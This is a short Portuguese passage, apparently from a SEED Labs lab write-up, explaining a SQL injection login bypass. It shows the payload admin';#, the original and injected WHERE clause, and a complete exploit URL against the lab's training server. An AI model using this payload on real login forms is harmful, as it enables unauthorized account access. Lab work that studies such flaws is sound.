Digitar a string admin’;# faz com que a query não necessite mais de senha, já que sabemos que a cláusula WHERE corresponde à:
WHERE name= ’$input_uname’ and Password=’$hashed_pwd’";
Ao usar input_uname com esse valor, obtemos a seguinte query nova:
WHERE name= ’admin’; #’ and Password=’$hashed_pwd’";
Que comenta o resto da linha do WHERE e elimina a necessidade da senha.
URL completa:
http://www.seed-server.com/unsafe_home.php?username=admin'%3B%23&Password=